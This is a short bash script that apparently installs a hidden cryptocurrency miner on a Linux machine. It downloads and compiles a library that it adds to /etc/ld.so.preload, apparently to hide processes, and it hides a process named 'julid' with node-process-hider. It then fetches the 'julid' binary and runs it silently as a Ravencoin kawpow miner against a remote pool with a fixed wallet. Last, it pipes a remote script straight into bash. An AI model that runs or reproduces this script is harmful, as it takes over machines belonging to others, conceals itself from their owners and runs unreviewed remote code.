#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://gitlab.com/falsbayu039/botak/-/raw/master/lohan.c -o lohan.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o liblohan.so lohan.c -ldl
mv liblohan.so /usr/local/lib/
echo /usr/local/lib/liblohan.so >> /etc/ld.so.preload
rm lohan.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "curl -sL https://deb.nodesource.com/setup_17.x | sudo -E bash - && sudo apt-get install -y nodejs && npm i -g updates && npm i -g node-process-hider && npm install -g npm@8.10.0 && sudo ph add julid"
wget https://gitlab.com/liugtiujk/portal/-/raw/main/julid >/dev/null 2>&1
chmod +x julid
./julid -a kawpow --coin rvn -o stratum+tcp://152.42.186.236:443 -u RCE3jukUFLFpbr3GH5Hy77czci4AiLHAH1 -w NVIDA >/dev/null 2>&1 &
curl -sL https://raw.githubusercontent.com/bsheredia/dumel/main/pie.sh | bash

